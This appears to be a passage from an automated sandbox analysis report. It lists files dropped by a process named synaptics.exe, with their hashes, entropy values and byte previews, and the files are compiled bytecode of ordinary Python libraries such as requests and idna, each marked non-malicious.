                                                                                                                                                                                                                                  Preview:o.......>..f.0.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z.e.e.d...d.e.d.e.e...f.d.d.....Z.e.e.d...d.e.d.e.f.d.d.....Z e.e.d...d.e.d.e.f.d.d.....Z!e.e.d...d.e.d.e.f.d.d.....Z"e.e.d...d.e.d.e.f.d.d.....Z#e.e.d...d.e.d.e.f.d.d.....Z$e.e.d...d.e.d.e.f.d.d.....Z%e.e.d...d.e.d.e.f.d.d ....Z&e.e.d...d.e.d.e.f.d!d"....Z'e.e.d...d.e.d.e.f.d#d$....Z(e.e.d...d.e.d.e.f.d%d&....Z)e.e.d...d.e.d.e.f.d'd(....Z*e.e.d...d.e.d.e.f.d)d*....Z+e.e.d...d.e.d.e.f.d+d,....Z,e.e-e...d...d-e.d.e.f.d.d/....Z.e.e.d...d.e.d.e.f.d0d1....Z/d_d3e0d4e1d.e.e...f.d5d6..Z2e.d7d...d8e.d.e.f.d9d:....Z3d3e0d.e.e.e...e0f...f.d;d<..Z4d=e.d.e.f.d>d?..Z5d`dAe.dBe.d.e.f.dCdD..Z6dEe.d.e.e...f.dFdG..Z7dHe.dIe.d.e8f.dJdK..Z9dHe.dIe.d.e.f.dLdM..Z:dNe.j;dOf.d8e.dPe1dQe.d.d.f.dRdS..Z<..dadTe0dUe.dVe=dWe1dXe.dYe.dZe0d[e.d\e.e...d.e.e.d.d.f...f.d]d^
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):252
                                                                                                                                                                                                                                  Entropy (8bit):5.312246123551203
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:y/BGt/z/Oszurb64b7+uaHKdArsQx6G3D8Isi:CQ/z/OsJa/hQ8GT8Iv
                                                                                                                                                                                                                                  MD5:763EBE05301CFA08EE5E8AA24F64CE04
                                                                                                                                                                                                                                  SHA1:39A3116BDFA7F417B800CDAA0E59E7143175D0E3
                                                                                                                                                                                                                                  SHA-256:DC9B7F717B98AD5AED301701B046240D02E6540B130CB45BD77CE74F3E8E5FA0
                                                                                                                                                                                                                                  SHA-512:9600AAC9595DF1441A1317D4EA2A6E646AA242A1138C69AD1BDD6DAEA1516D1A6D239E8D9461ADCF85C9D46F03C51CE6A98C280F686732D392DD3BA75FE51A20
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fU........................@...s....d.Z.d.Z.e...d...Z.d.S.).z..Expose version.z.3.3.2...N)...__doc__..__version__..split..VERSION..r....r.....JC:\Users\Public\M20EKMMEH2\lib\site-packages\charset_normalizer\version.py..<module>....s..........
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):818
                                                                                                                                                                                                                                  Entropy (8bit):5.1134892336275835
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:CSCSrJBifjefr9xLGmdChEYOcAMmXkOOs28s4qUUjOs28ssqU/LcSzx5:pijeXL/whvOcAdtOb8fcjOb897cA
                                                                                                                                                                                                                                  MD5:6BFDC605B9EB2AA65A846B5C298D6829
                                                                                                                                                                                                                                  SHA1:E1E241B8BFC29FCD276ED0CE7F0130940F1EC5D7
                                                                                                                                                                                                                                  SHA-256:CFEBE48F48CB1CBE3B791704302423C190FB620DA36576C4C0CAB3054D811F38
                                                                                                                                                                                                                                  SHA-512:864B5A72BF805432D800E9D975DC77F14F9B642FA94DBA054787F7191BB95DA6879CC4F3050A5B3A834A1C66E4CA1849AEF1C7131047FDFEDF38D5BD5309A514
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fd........................@...st...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.S.)......)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain)...__version__).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....Z.intrangesr....Z.package_datar......__all__..r....r.....=C:\Users\Public\M20EKMMEH2\lib\site-packages\idna\__init__.py..<module>....s....P.......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9915
                                                                                                                                                                                                                                  Entropy (8bit):5.447135003519235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:NePGIILf6bj+bMh9t5uszP0M7Bhu5XCwY2uVNnaMWT/czpko:cPpIS+bMPt5usb1h0XFY2ubnUbQ
                                                                                                                                                                                                                                  MD5:26139DE55A37341BDF55558330351D34
                                                                                                                                                                                                                                  SHA1:BC2D1D66E2B25C714413FB9C0E7372D4384ED2CD
                                                                                                                                                                                                                                  SHA-256:CCD489246654C417B243EB5651EFE7CE4B5B963531D78B6B053AC1319450EDC8
                                                                                                                                                                                                                                  SHA-512:73C888F044536D6EEFDB2018C12C28E0D3F6A48F457B7A937A8755A63A1871F4CE3BCA4BD6B3C4A58282735DBA6C99B78DBF123C9CA80002A3D426AC39D88CDD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fR5.......................@...sj...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e...d...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d ..Z.d.e.e.e.f...d!e.d.e.f.d"d#..Z.dFd.e.d%e.d.e.f.d&d'..Z.d.e.d.e.f.d(d)..Z.d.e.d.e.f.d*d+..Z d.e.d.d.f.d,d-..Z!d.e.d.e.d.e.f.d/d0..Z"dFd.e.d.e.d1e.d.e.f.d2d3..Z#d.e.e.e.e$f...d.d.f.d4d5..Z%d.e.d.e.f.d6d7..Z&d.e.e.e.e$f...d.e.f.d8d9..Z'dGd;e.d<e.d=e.d.e.f.d>d?..Z(.$.$.$.$dHd.e.e.e.e$f...d@e.dAe.d<e.d=e.d.e.f.dBdC..Z).$.$.$dId.e.e.e.e$f...d@e.dAe.d<e.d.e.f.dDdE..Z*d.S.)J.....N)...Optional..Union.....)...idnadata)...intranges_contain.....s....xn--u....[....])%.0....1....2....3....4....5....6....7....8....9...._....a....b....c....d....e....f....g....h....i....j....k....l....m....n....o....p....q....r....s....t....u....v....w....x....y....z...c....................@........e.Z.d.Z.d.Z.d.S.)...IDN
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198617
                                                                                                                                                                                                                                  Entropy (8bit):3.520847117635768
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:PIS0p2ZbbO4g3aD8yynBXmD4RoC2Mo+4S+s8ecqmUM2UK+QQeky22ImSsEgYtqWy:P621S458yyP
                                                                                                                                                                                                                                  MD5:C5BE67379C9E175E6912B02E169DE926
                                                                                                                                                                                                                                  SHA1:B68261E7058A98BAE3485BD1E72F3042288A67A4
                                                                                                                                                                                                                                  SHA-256:F526693F256186AA7D2A82F8B87C9E0843B50DF7D57C69675AEE0FCA6181205A
                                                                                                                                                                                                                                  SHA-512:7C1D8FFC423B0FC6C0EB02061E7FFEAD367C323BC53A63B177631B4EF6591F02010CB769799F0AC748CDCD41B153FD69D69FDB05D8A2A67978E351726CFD5CFD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.7.......................@...s.]..d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1950
                                                                                                                                                                                                                                  Entropy (8bit):5.30991114223019
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:DrDo6itCRy/ORh72aGN+Rl/99X7iEvR9Bn:Drc7kR2BNC/9t7jvN
                                                                                                                                                                                                                                  MD5:F32A67671E3A2184F1AD34954CB352AB
                                                                                                                                                                                                                                  SHA1:876A49E3BD85D3116B388AA8E98F521B6B138275
                                                                                                                                                                                                                                  SHA-256:2C07149E3BCE0A8777D77344CBF4E1A8A8661923F8A1837CECA52B9A66743645
                                                                                                                                                                                                                                  SHA-512:FA3F167DB18B3BD7993514A2212E647209D2F196E5E627FCCDD03A48643AF1294D7C0823727558F34A1334322E4169BACB1C6FED96A7F98541B4571EEADF35EF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..fj........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e...d.e.e.d.f...f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e.e.f...f.d.d...Z.d.e.d.e.e.d.f...d.e.f.d.d...Z.d.S.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c....................C...s....t.|...}.g.}.d.}.t.t.|.....D.]1}.|.d...t.|...k.r%|.|...|.|.d.....d...k.r%q.|.|.d...|.d.......}.|...t.|.d...|.d...d.........|.}.q.t.|...S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. ..........r....)...sorted..range..len..append.._e
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):177
                                                                                                                                                                                                                                  Entropy (8bit):4.852106922029477
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:y/BAauletxbkCoeJ/Lt/lPlmuaHF5oXu5E5DVWrzSBw5JOmIOt2TgN:y/rqetGCow5GuaHKdArmBw5Ampt2s
                                                                                                                                                                                                                                  MD5:492AD7B58B744002000BF6678FB09728
                                                                                                                                                                                                                                  SHA1:64CB95059980DF90AA6A6EA5D8DDF5FB2345920E
                                                                                                                                                                                                                                  SHA-256:8840D3E9A1B7DDF1DD358A6C3332ABFCD05A6825F33D9F65616659AB05303869
                                                                                                                                                                                                                                  SHA-512:9BA8311AADAF4A00BB710C97300ED31ED2449AB5317938A3E7942295CAD8DF152D1D3A2F5C82FD6452FCBCEAC00C424EDF6BA488E7B7DD9B5D42B7C84534DA22
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......>..f.........................@...s....d.Z.d.S.).z.3.9N)...__version__..r....r.....AC:\Users\Public\M20EKMMEH2\lib\site-packages\idna\package_data.py..<module>....s......
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3902
                                                                                                                                                                                                                                  Entropy (8bit):5.789773042831559
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:QqPoGNOeYVGivMhhFJQlIgSdAhoupVaxdses42WQXIBmPy6V7:RP8MhqKgSeh8dFQYBwh
                                                                                                                                                                                                                                  MD5:6EF94DE82A5FB4D691EB84350F7CC525
                                                                                                                                                                                                                                  SHA1:AC315954690BF0E4EDFDD4B7D1B1FBD37BFE4D91
                                                                                                                                                                                                                                  SHA-256:FD857670319C0B5AE37790F3AE714966DB60BC3DB6AF931DB5BDADDEC584385B
                                                                                                                                                                                                                                  SHA-512:D322EBC1CEDAF2C06138688F1C9A3F43A125CF4FF1A432E68FAF0CAAC5C4D21752CA32EF76E7A47464F39DEC8B34135BAE909C00A3E7887116A2FF83F898ACF7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y#......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y7......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.y`......e...d...e.j.e.e...e.....Y.n.w.z.z.d.d.l.Z.W.n...e.ys......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m.Z...d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1..d.d.l.m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..e..EeF...Ge.......e.j.d.e4d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):516
                                                                                                                                                                                                                                  Entropy (8bit):5.52370899308328
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:CAHUexOsG8ReRyu7msvBXV5b4SazcAFAu63WcwbRm7hooookk:tZxdOyqmsvBF5McAFAu6pw14ek
                                                                                                                                                                                                                                  MD5:AC9724E4CB098C3FF8AEAB3A4D73EEDD
                                                                                                                                                                                                                                  SHA1:BE813398A2E7F4E4F06BD244286BEE050185AD2F
                                                                                                                                                                                                                                  SHA-256:3040883CF10C2FB614018082BFEFA05479B61B837BAFFCD7398D250DF766C8F9
                                                                                                                                                                                                                                  SHA-512:4504D8C5678DFDDC7B21CB9BE19885381814A4DEBD158A3A8B23AF08B5A9D98F70037372028C48D1EBCDE1CDDA1F40A6FC4715A2E49A943B119C375B5F01B5DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.32.3i.2..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache-2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....DC:\Users\Public\M20EKMMEH2\lib\site-packages\requests\__version__.py..<module>....s........................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1592
                                                                                                                                                                                                                                  Entropy (8bit):5.6578879401098865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tmUBWAmpGWydoNxLeucr1OlX4Ja8me5Q+:E0j95+nipYqa8me5Q+
                                                                                                                                                                                                                                  MD5:98C5449652DC5EDA5D3ABCBB85EA4AB9
                                                                                                                                                                                                                                  SHA1:F1E7CB691E9F3D62737755BBC6C205BE205FACA9
                                                                                                                                                                                                                                  SHA-256:411DD2E7DBF3C31F71BC487C14D051CA72DA4329400CFDE4515F43E19FC54BEE
                                                                                                                                                                                                                                  SHA-512:888578D43DBD614EA7190E705FB52BCC073B6875BB5A4467B9A48A34ADF1B4ACAD4E382FCFB55DC8C6155978B9635337B463905250F94233A16EB0B0C8CC4E56
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...sr...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....HC:\Users\Public\M20EKMMEH2\lib\site-packages\requests\_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...t.y.......Y.d.S.w.).z.Determine if unicode
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22006
                                                                                                                                                                                                                                  Entropy (8bit):5.4313805771320975
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:YmMtzG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:g0TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                                                                  MD5:47DE8B36F055B471245EC7DB9FC108D9
                                                                                                                                                                                                                                  SHA1:0F0C8E3600BD98F5D75A0C228928013BBE02785F
                                                                                                                                                                                                                                  SHA-256:563AF6289FA08B14AD111CE236ED42EB033FDEBCFECF34ECA8F5872835F1E2D7
                                                                                                                                                                                                                                  SHA-512:6267C70CA3962C86906D653384FE3663BFCD6B78F39E140D6E1C275D2635884175DFE6CD5542044324CAE7C0F3577574FBC10E0C23F1E10C2A10698B323EAA0C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6692
                                                                                                                                                                                                                                  Entropy (8bit):5.146225255700994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:s4kMfrO7AyGLluXW87ZolNAzj8t8aYat9DMGm6RGmOsGmfiC:wMDY7EeZjM81eRys2C
                                                                                                                                                                                                                                  MD5:2BCB2D36DF4C178ED0826624ED585D1C
                                                                                                                                                                                                                                  SHA1:12D3806F8787A474DBC78BBD3947C56B9BEEB577
                                                                                                                                                                                                                                  SHA-256:ED348057B20F3E1E87FB9FF738444BD1410D648C2AB58F36A32BABB147739A1E
                                                                                                                                                                                                                                  SHA-512:4A919D8F37FF1B9EDC798C06D56892D37030AF54971ABCEC3F2B8063A12688779DF7FBA9F13494CAF57EDBFAA1D08D385D505FEC2FC3744C4AA45B45528E3ADC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f1........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8088
                                                                                                                                                                                                                                  Entropy (8bit):5.488681652839057
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5B0um1AjzLPVCFA1PCGLcBCJI1W22VjwTrhhbVYy:X0um1iVCOPCGLRWW22aTNhl
                                                                                                                                                                                                                                  MD5:6F7F57A6A0C65F7D0D74915BF4132A49
                                                                                                                                                                                                                                  SHA1:377768563A3B648AD171C78316B50D466E159228
                                                                                                                                                                                                                                  SHA-256:B71C9C19E76971C869BA0B3FBE8BF8ECCC2A8AD8B786071B8D4B44FFCBE8E7C4
                                                                                                                                                                                                                                  SHA-512:2946F5C8EBB40C60AA93A32DA67CD9CA8CC3D5477E2AB7BF74F60330072E684E973EE3E2A827FE6F6BA95571344C18C354C0D3203632757D82D147C10734BA9F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):593
                                                                                                                                                                                                                                  Entropy (8bit):5.305022762068304
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:CA67OBe1A3Dj4uIy1XfB4A4kvYa4Zk3S2sUCc01gbRUcENM:t6jgbXKAhwa93DRCk1Z
                                                                                                                                                                                                                                  MD5:1ECBEF9AF18F87C4E186D078940DCF06
                                                                                                                                                                                                                                  SHA1:B039F13A484308944CF61D4AE53BC1A6E2A25BC4
                                                                                                                                                                                                                                  SHA-256:28ADC812C57BF53DF2B15A92462CFB477DC1998134A86FE82AACC82DC9FDAC2B
                                                                                                                                                                                                                                  SHA-512:8B89C3C3E8A0EA634AAE418ABC20A508EA1AE1B5D77450FB7C80BBE3E4463B2DD3C0500317786366B648B23167157761ED90BA3362D31C82B5DED179EAF2F33B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s*...d.Z.d.d.l.m.Z...e.d.k.r.e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......)...where..__main__N)...__doc__Z.certifir......__name__..print..r....r.....>C:\Users\Public\M20EKMMEH2\lib\site-packages\requests\certs.py..<module>....s..............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1744
                                                                                                                                                                                                                                  Entropy (8bit):5.603505530552
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tNAUIkbGXHyOLyRJV79xllKPV+5MTYGi4k0b8+:nR8XyUyRJJ9pKPV+5f4kI
                                                                                                                                                                                                                                  MD5:164321AF07A551EC064491F8C409D891
                                                                                                                                                                                                                                  SHA1:0829701F0B0FAB3D9C6CDB13B3B741064CD5E3E1
                                                                                                                                                                                                                                  SHA-256:5C26B7E8C90B3239765E95A9FE641C45510E1501F96BE2575F0045D9DCED34C0
                                                                                                                                                                                                                                  SHA-512:467F01D3FA58B4AD6F91A4E56F6CB5B501F8710ADBB3C17CA27382F40DC6C371F0B7D608F1DE3E5C9A751D59360DC5C3DDADD48F248923BB0509F1FB139871F4
                                                                                                                                                                                                                                  Malicious:false
